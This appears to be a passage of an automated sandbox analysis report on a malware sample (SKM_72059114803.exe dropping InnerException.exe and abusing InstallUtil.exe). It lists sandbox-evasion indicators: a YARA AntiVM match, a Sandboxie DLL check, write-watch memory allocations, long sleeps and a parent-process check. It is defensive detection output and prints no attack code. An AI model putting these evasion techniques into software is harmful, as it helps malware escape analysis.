Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: SKM_72059114803.exe PID: 7160, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InnerException.exe PID: 6896, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SKM_72059114803.exe, 00000000.00000002.1060739593.0000000002941000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.1196368845.0000000002441000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory allocated: CA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory allocated: 2940000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Memory allocated: 4940000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 30C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3600000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Memory allocated: A30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Memory allocated: 2440000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Memory allocated: 2340000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2170000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 25C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2370000 memory reserve | memory write watch Jump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 2_2_004019F0
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599073 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598953 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598721 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598608 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598266 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598141 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598031 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597922 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597692 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597276 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597129 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596988 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596765 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596200 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595969 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595750 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595640 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595531 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595422 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595313 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594969 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594619 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594516 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594280 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594172 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594062 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599434 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599324 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599190 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598919 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596705 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596268 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596141 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595563 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594763 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594438 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593782 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593657 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2762 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7074 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 6326 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3488 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SKM_72059114803.exe TID: 6248 Thread sleep count: 188 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -37815825351104557s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6612 Thread sleep count: 2762 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6612 Thread sleep count: 7074 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -599641s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -599531s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -599422s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -599073s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -598953s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -598844s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -598721s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -598608s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -598484s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -598375s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -598266s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -598141s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -598031s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6604 Thread sleep time: -597922s >= -30000s Jump to behavior
